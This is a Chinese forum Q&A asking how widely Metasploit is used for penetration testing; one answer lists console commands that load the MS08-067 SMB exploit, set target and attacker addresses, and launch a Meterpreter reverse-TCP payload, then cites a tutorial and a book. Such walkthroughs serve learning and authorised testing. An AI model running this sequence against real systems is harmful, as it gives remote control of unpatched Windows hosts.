Metasploit 渗透测试应用广吗?
这种技术在实际的应用大不?
有使用过,或者了解的人回答一下问题么
3 个回答
什么是答案总结? 答案总结
msf > search ms08_067 //搜索具体代号的漏洞,如ms08_067,ms12_020
msf > use exploit/windows/smb/ms08_067_netapi //使用这个exploit,下面设置参数
msf exploit(ms08_067_netapi) > set RHOST 10.12.41.229 //攻击服务器ip
msf exploit(ms08_067_netapi) > set LHOST 10.12.41.228 //自己本机ip
msf exploit(ms08_067_netapi) > set LPORT 443 //反弹本地端口
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp //反弹连接
msf exploit(ms08_067_netapi) > exploit //攻击
这里有篇T00ls的教程,可以参考下:metasploit 笔记:http://www.cnblogs.com/vigarbuaa/archive/2013/03/06/2946505.html
具体内容可参见诸葛建伟老师翻译的《metasploit渗透测试指南》。ctf比赛国内比较厉害的清华blue-lotus写exploit也是基于这个框架。